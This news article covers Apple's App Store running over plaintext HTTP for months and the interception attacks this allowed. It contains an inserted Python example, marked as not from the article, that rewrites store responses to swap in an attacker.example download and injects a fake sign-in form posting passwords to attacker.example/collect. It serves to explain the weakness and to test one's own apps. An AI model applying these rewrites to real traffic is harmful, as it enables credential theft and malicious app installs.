Apple's App Store lacked encryption protection for months

Apple's App Store operated for months without the protection of SSL/TLS encryption, according to researchers.

Apple announced it had fixed the problem in January, but the researchers who discovered the flaw didn't write about it until this month.

"I am really happy that my spare-time work pushed Apple to finally enable HTTPS to protect users," Elie Bursztein, whose full-time job is with Google, wrote in a personal blog.

Apple did not respond to a request for comment.


Bursztein, along with Bernhard "Bruhns" Brehm of Recurity Labs and Rahul Iyer of Bejoi, found in July 2012 that communications between Apple's App Store and its users were carried over plaintext HTTP rather than HTTPS. Because anyone on the same network can read and rewrite unencrypted traffic, that deficiency opened users up to several kinds of attack on public networks, like those found in an airport or coffee shop, according to Bursztein.

The potential attacks included:

  • Password Stealing. When a user logged into the App Store, an attacker on the same network could slip a phony password prompt into the unencrypted pages, effectively asking the user to hand over their password. "That Apple ID controls your credit card for buying music and apps; it controls all your backups with all your contacts," Chet Wisniewski, a security advisor with cyber security software maker Sophos, said in an interview. "That's pretty sensitive stuff. The Apple ID is similar to Facebook and Google. Once it's hacked, it cracks open the walnut of your entire digital life."

  • App Swapping. By rewriting the store's response, an attacker could get a user to install the attacker's app while the user believes they are installing legitimate software. A paid app could also be substituted for the free app the user meant to install, leaving the victim with the charge.

  • Fake Upgrades. Cyber thieves could tamper with the update process so that a user installs something other than the app upgrade they think they are getting.

  • Installation Prevention. An attacker could keep an app from being installed on a device, either by removing it from the store listing the device sees or by tricking the device into thinking the app has already been installed.

  • App Spying. The App Store's update mechanism sent the list of installed applications in the clear, so anyone eavesdropping on the network could see every app on a user's device.
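To make the class of attack concrete, the Python below models an on-path attacker on a shared Wi-Fi network reading and rewriting plaintext HTTP between a device and an app store. This is an added example, not code from the article or from the researchers' write-up, and every message format in it (the update-check JSON, the manifest JSON, the HTML sign-in page, the hostnames and field names) is a constructed stand-in, not Apple's real wire protocol. It covers the five attacks above: app spying (passive read), app swapping and fake upgrades (rewriting the download URL and price), installation prevention (rewriting the manifest so the device thinks the app is present) and password stealing (injecting a phony sign-in form).

```python
# Added example, not code from the article or the researchers' write-up.
# All formats, hostnames and field names below are constructed assumptions
# modelling an on-path attacker rewriting plaintext HTTP; none is Apple's
# actual App Store protocol.
import json


def split_message(raw: bytes):
    """Split an HTTP/1.x message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def join_message(start: str, headers: dict, body: bytes) -> bytes:
    """Reassemble a message, fixing Content-Length so the device accepts it."""
    fixed = dict(headers)
    fixed["content-length"] = str(len(body))
    head = start + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in fixed.items())
    return head.encode("iso-8859-1") + b"\r\n" + body


# Constructed sample: the device asks the store which installed apps have updates.
SAMPLE_UPDATE_CHECK = join_message(
    "POST /update-check HTTP/1.1",
    {"host": "store.example", "content-type": "application/json"},
    json.dumps({"installed": ["com.example.bank", "com.example.mail"]}).encode(),
)

# Constructed sample: the store's reply describing the app the user chose.
SAMPLE_MANIFEST = join_message(
    "HTTP/1.1 200 OK",
    {"content-type": "application/json"},
    json.dumps({"bundle_id": "com.example.notes", "price": "0.00",
                "download_url": "http://cdn.store.example/notes.ipa"}).encode(),
)

# Constructed sample: the store's HTML sign-in page.
SAMPLE_LOGIN_PAGE = join_message(
    "HTTP/1.1 200 OK",
    {"content-type": "text/html"},
    b"<html><body><h1>Sign in</h1></body></html>",
)


def spy_installed_apps(raw_request: bytes) -> list:
    """App spying: a passive listener on the network reads the update check."""
    _, headers, body = split_message(raw_request)
    if not headers.get("content-type", "").startswith("application/json"):
        return []
    return list(json.loads(body).get("installed", []))


def swap_app(raw_response: bytes, evil_url: str, charge: str = "4.99") -> bytes:
    """App swapping / fake upgrade: point the device at the attacker's binary
    and, to model the paid-for-free substitution, rewrite the advertised price."""
    start, headers, body = split_message(raw_response)
    manifest = json.loads(body)
    manifest["download_url"] = evil_url
    manifest["price"] = charge
    return join_message(start, headers, json.dumps(manifest).encode())


def suppress_install(raw_response: bytes) -> bytes:
    """Installation prevention: tell the device the app is already installed."""
    start, headers, body = split_message(raw_response)
    manifest = json.loads(body)
    manifest["already_installed"] = True
    manifest.pop("download_url", None)
    return join_message(start, headers, json.dumps(manifest).encode())


def inject_password_prompt(raw_response: bytes, collector: str) -> bytes:
    """Password stealing: add a phony sign-in form to an unencrypted HTML page.
    Non-HTML responses are passed through untouched."""
    start, headers, body = split_message(raw_response)
    if not headers.get("content-type", "").startswith("text/html"):
        return raw_response
    form = (f'<form action="{collector}" method="post">Session expired, '
            'sign in again: <input name="user">'
            '<input name="pass" type="password"><input type="submit"></form>'
            ).encode()
    body = body.replace(b"</body>", form + b"</body>", 1)
    return join_message(start, headers, body)


def parse_json_body(raw_response: bytes) -> dict:
    """Decode a JSON body the way the device would, checking Content-Length."""
    _, headers, body = split_message(raw_response)
    assert int(headers["content-length"]) == len(body)
    return json.loads(body)


if __name__ == "__main__":
    print("installed apps seen on the wire:", spy_installed_apps(SAMPLE_UPDATE_CHECK))
    print(parse_json_body(swap_app(SAMPLE_MANIFEST, "http://attacker.example/notes.ipa")))
    print(parse_json_body(suppress_install(SAMPLE_MANIFEST)))
    print(inject_password_prompt(SAMPLE_LOGIN_PAGE, "http://attacker.example/collect").decode())
```

None of these rewrites would survive HTTPS with proper certificate validation: the attacker on the coffee-shop network would see only ciphertext, and any modification would fail the record integrity check before the device parsed it. The same script doubles as a check for your own apps: if you can rewrite an app's responses this way from an intercepting proxy on a Wi-Fi network you control, that app has the same weakness the App Store had.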

With App Store communications vulnerable for so long, it's a wonder that a significant attack didn't take place, said HD Moore, CSO of Rapid7 in Boston.

"I've seen the hacker community talking about this and demonstrating different techniques," he said, "but it is surprising that there haven't been any more wide-scale attacks."

A limiting factor, he explained, is that the attacker has to be on the path between the victim and the store: in the same physical area, on the same local network segment or the same wireless network.

The security breakdown could encourage mobile app makers to take another look at their wares, Moore added. "On mobile devices, a lot of folks can't tell if SSL is on in the background. With desktops and laptops, users have been well-trained to look for that SSL lock icon in the corner."

The incident could also grab the attention of security shops at online retailers, said Jamz Yaneza, threat research manager at Trend Micro in Cupertino, Calif.

"I think it's a wake-up call for online retailers who outsource development of apps," he said. "When they do that, they should make sure those apps use all the encryption that's required.

"With all the breaches we've been hearing about in the past few weeks, now is the time for them to take a close look at how they're securing customer data."

Read more about application security in CSOonline's Application Security section.

Stories by John P. Mello Jr.